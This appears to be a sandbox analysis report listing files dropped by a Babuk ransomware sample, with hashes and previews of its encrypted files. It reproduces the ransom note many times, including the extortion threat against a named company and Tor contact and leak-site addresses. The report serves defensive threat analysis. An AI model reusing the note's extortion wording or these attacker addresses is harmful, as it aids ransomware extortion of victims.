                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.551244655242181
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlXMYcc8xpAWDtJHfW5L+nh+iq6HMUbxCvJjBUAfeV0fImXaLUxNvEEn:HM5Ym3/W5L++MCvFjGV0fYL0vtn
                                                                            MD5:A9A24F79176A57DF23063A918A292C17
                                                                            SHA1:BC023818C089A65F52AC9D51C69749FE47CC32A6
                                                                            SHA-256:DCE0EF993323E1BBC7C1A57220FF14D2724D81192BE1D472BD4A3BB68E7FB58E
                                                                            SHA-512:D7AF6B7C312C572863EFFC465321974547871E84BE170A4CCDF0EF7CD01DD740D139B6B1F722EC352C200F39745E655CAB5D2FC0A4985A58C279E0321F3F9CC4
                                                                            Malicious:false
                                                                            Preview: ..........s.{.P.2......z/t.@C....c..sn.'...."E.p...k..s...z.H.r...-.[.E;$.....S ~Y.].ME..'.9D..v...qeI.s.........-.4kQ....]m......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.977975926691697
                                                                            Encrypted:false
                                                                            SSDEEP:192:5ncJ6T+63JWPSMLWfMze3/FhRcW5LqV6fM6+gVjRW/FNMGo:5ncIWPFG4W5G4fd+gFR2MB
                                                                            MD5:89C343343F97709D00BE40B4E8C11631
                                                                            SHA1:849C4CA20C41BA4256A647665424ED9B1363C264
                                                                            SHA-256:81B20BE21C3AF23ABE0FF40606AAA6FD80A196EEAFC14A8C4C4350E7CAC52D04
                                                                            SHA-512:604B1312CDA11031703DEE6A92DEBAF1E8BE470CD9498CA17B83BEC6020016B850A431FD80DB6AB50C6F017CF5E032B83D577555816059694CD80B9803D969A9
                                                                            Malicious:false
                                                                            Preview: .X0.x35.ZW..=.t\....}7.M=0....``..u....e.X:&@/...#^.ZlG ....u..n.C........ S..f...[H.{n+.I.3L@...q.0}.epU..V.w........5.%.....M.D.8......+..C.r.5.*...xF<.Sn.V.....dY.R}I.D..w......H.Jl.o...D5.x.a."..F(........i^....[k_..m.f....!./..I.'jH@.fNk ...x./;...@.:/..~.7.>s..7R .l.T/$.0...1.t...N..Ld*T.b.;.7Nd.L!..22u.i....NS.#y....*`.N)%V...$X.[L...@&..$.3........p....QMZ....x'...b7.....`.D+..8Y...Q.D....P..e.....E;...{8.x;..8MMc..Z.....A....W...T<}.L^.....NrA...Q.....+l......H7>s...G...~...I..Q..r.........d..O....Y.y..........-.L.sN...R....,....8......)4....Y....A.E...G.....s.-.B...3..$.K4.I...W6.-+..I..6.....&.._..F..S..w.....C.xN......e...z.1..tX...}5Y. `y....a[.... ...,....)...w&Tv....X..7.sP....&F...S..t.{M..iH.y.V.C..^...:7/i.p..>;b/../.(.ZX>.BD..l.j$j2/..i..........;...x......*.Yp........cK8.T.G..j.=..r...+.&E..H.D....C..{chV2....-..;..s...s...{..+J9%..Vb.?...i..Gt..v..m..ru#....%....MD.NR...^.:.S.>.[g!.(...F2a..p...........f..c...Y....P.b.
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Collab\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
